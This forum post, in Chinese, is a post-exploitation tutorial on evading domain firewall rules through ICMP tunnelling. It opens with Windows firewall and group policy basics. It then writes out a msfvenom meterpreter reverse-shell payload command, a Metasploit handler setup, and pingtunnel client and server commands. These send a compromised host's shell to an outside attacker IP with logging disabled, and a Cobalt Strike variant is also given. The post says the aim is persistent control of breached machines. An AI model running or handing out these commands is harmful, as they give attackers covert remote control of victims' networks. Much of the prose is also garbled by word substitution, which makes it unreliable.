论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
应用中心
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
IT评测·应用市场-qidao123.com技术社区
»
论坛
›
安全
›
终端安全
›
内网安全:初探隧道技能
内网安全:初探隧道技能
道家人
论坛元老
|
2024-7-22 14:32:03
|
显示全部楼层
|
阅读模式
楼主
主题
1870
|
帖子
1870
|
积分
5610
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
目次
防火墙必备知识
域控-防火墙组计谋对象同步
域控 - 防火墙组计谋不出网上线
MSF上线
CS - ICMP上线
留意:隧道技能是后渗出本领,是在已经取得权限后的本领
域控-组计谋同步
防火墙必备知识
学习防火墙的目的是知道了解防火墙的一些常见配置对内网渗出的影响,并不需要像运维一样全面了解防火墙
参考资料:Windows防火墙限制端口/IP/应用访问的方法以及例外的配置
这是阿里云关于windows运维的文档,内里有常见的winodws防火墙配置
防火墙(Firewall)是一种网络安全装备或软件,用于监控和控制网络流量,以保护计算机和网络免受未经授权的访问、恶意攻击和网络威胁。
防火墙通过建立规则和过滤器来管理进出网络的数据流,以确保只有授权的数据可以或许通过。
防火墙的告急功能包罗:
包过滤:防火墙查抄传入和传出网络的数据包,并根据预定义的规则集来决定是否允许通过。这些规则基于源IP地址、目的IP地址、端口号、协议范例等来过滤数据包。
状态检测:防火墙可以追踪网络连接的状态,并仅允许与已建立连接相干的响应数据包通过。这有助于防止未经授权的外部主机访问内部网络。
网络地址转换(NAT):防火墙可以实行网络地址转换,将内部私有IP地址转换为公共IP地址,以增强网络安全和隐私。
应用程序过滤:一些高级防火墙还可以查抄数据包中的应用层信息,例如应用程序协议、有用载荷内容等,以便更精确地控制应用程序级别的访问和流量。
虚拟专用网络(VPN)支持:一些防火墙具有VPN功能,可以提供安全的远程访问和加密通信,使远程用户可以或许安全地连接到内部网络。
通过配置得当的防火墙规则和计谋,可以有用保护计算机和网络免受来自互联网和其他网络的潜伏威胁。防火墙通常被广泛用于企业网络和个人计算机,作为网络安全的告急组成部门。
关于出站,入站规则:这个出站,入站是针对服务而言的。对于一个Web站点,配置入站规则就是检测访问我们的流量,出站规则就是检测本机出去的流量。
防火墙根据用户不同网络环境有不同的防火墙。比如:
主机在域内的规则配置
主机对某个目的的规则配置
主机对公网的规则配置
在生活中,我们可以运行某个实行程序,系统会提示我们是否允许该应用访问公网网络。
还可以根据详细的协议,端口进行规则设置
还可以针对详细的协议进行出入站限制
有些破解软件的告急一步就是防止软件与外部网络进行连接,就会将该程序的出入站规则全部禁用。
域控-防火墙组计谋对象同步
在域中,可以通过组计谋对域内所有装备进行配置防火墙规则
新建一个计谋进行编辑
这下图进行配置
配置规则
逼迫实行
域内服务器也可使用命令更新:
gpupdate/force
复制代码
域成员逼迫同步DC域防火墙计谋
域控 - 防火墙组计谋不出网上线
背景介绍:域控通过组计谋设置防火墙规则同步后,域内用户主机被限制TCP出网,此中规则为出站规则
你可以Ping通百度,但无法访问百度网页。两个协议不一样!
思路:正向连接&隧道技能
如果是入站被限制呢?反向连接&隧道技能也可以解决
这里将会以ICMP协议为例,ICMP协议是Ping命令走的协议
项目地址:
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
这里我们实验是模拟DC禁用域成员主机TCP
实战中,TCP封杀的计谋:
主机出站TCP封杀 入站无法链接外网
采用正向连接:取得一台有网络的能和主机通讯的服务器权限(能连外网)
把数据给能出网的呆板,通过这台呆板进行正向链接控制它
主机出站TCP封杀 入站可以链接外网
采用正向连接
或者隧道技能:走其它协议出网
这里的实验是把TCP的数据封装到ICMP协议里带出来。因为目的ICMP未被禁止。ICMP隧道技能,在目的服务器中开启脚本负责将后门的TCP流量转入到ICMP协议中,kali中开启脚本负责监听和接受信息
隧道技能对比代理技能:
隧道技能:解决不出网协议上线的问题,利用可出网协议封装
代理技能:解决网络通讯不通的问题,利用跳板机建立节点
这两种操纵是已经取得该目的的system权限后,为了把权限移交出来而使用的,实现长期化控制。
MSF上线
MSF生成后门:
注意这里是127.0.0.1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f exe > msf.exe
复制代码
将TCP的流量发送到自己的4455端口
MSF启动监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
复制代码
启动工具,它的作用是把发送ICMP流量还原位TCP流量再被MSF吸收
./pingtunnel -type server 需要在目标主机上执行 需要高权限
复制代码
目的呆板上启动工具,实行下面命令:
pingtunnel.exe -type client -l 127.0.0.1:4455 -s 47.94.xx.xx -t 47.94.xx.xx:4444 -tcp 1 -noprint 1 -nolog 1
复制代码
它可以把本地3333端口吸收的TCP流量封装到ICMP协议内里,转发个MSF地点主机。
上线!!!
CS - ICMP上线
配置第一个监听器:
使用这个监听器生成后门
这个后门设置的原因和上面MSF是一样的,不再赘述。
生成第一个监听器
用来吸收反弹
攻击机上运行:
./pingtunnel -type server
复制代码
被攻击机上运行:
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1
复制代码
之后会在第二个监听器上吸收到连接
留意:隧道技能是后渗出本领,是在已经取得权限后的本领
域控-组计谋同步
域控进行了设置,所有的域内呆板都要受到影响,委派下发
软件安装,暗码更改等等
比如:给域内主机设置同一壁纸
壁纸地点目次设置共享
域内主机都能看到
完成设置,查察结果:
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
继续阅读请点击广告
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
道家人
论坛元老
这个人很懒什么都没写!
楼主热帖
CentOS7.9使用sealos部署单节点k8s并部 ...
青龙2.10.13 稳定版+Ninja登录面板+傻 ...
日本开放Wi-Fi 6E认证
软件危机与软件过程模型
〖Python接口自动化测试实战篇⑨〗- 实 ...
LyScript 从文本中读写ShellCode
网安工具 | Windows便携式渗透测试环境 ...
Redis和Mysql保持数据一致性
推荐一款完全开源,功能丰富,界面精美 ...
C#_串口调试助手-网络拓扑显示 ...
标签云
国产数据库
集成商
AI
运维
CIO
存储
服务器
浏览过的版块
云原生
快速回复
返回顶部
返回列表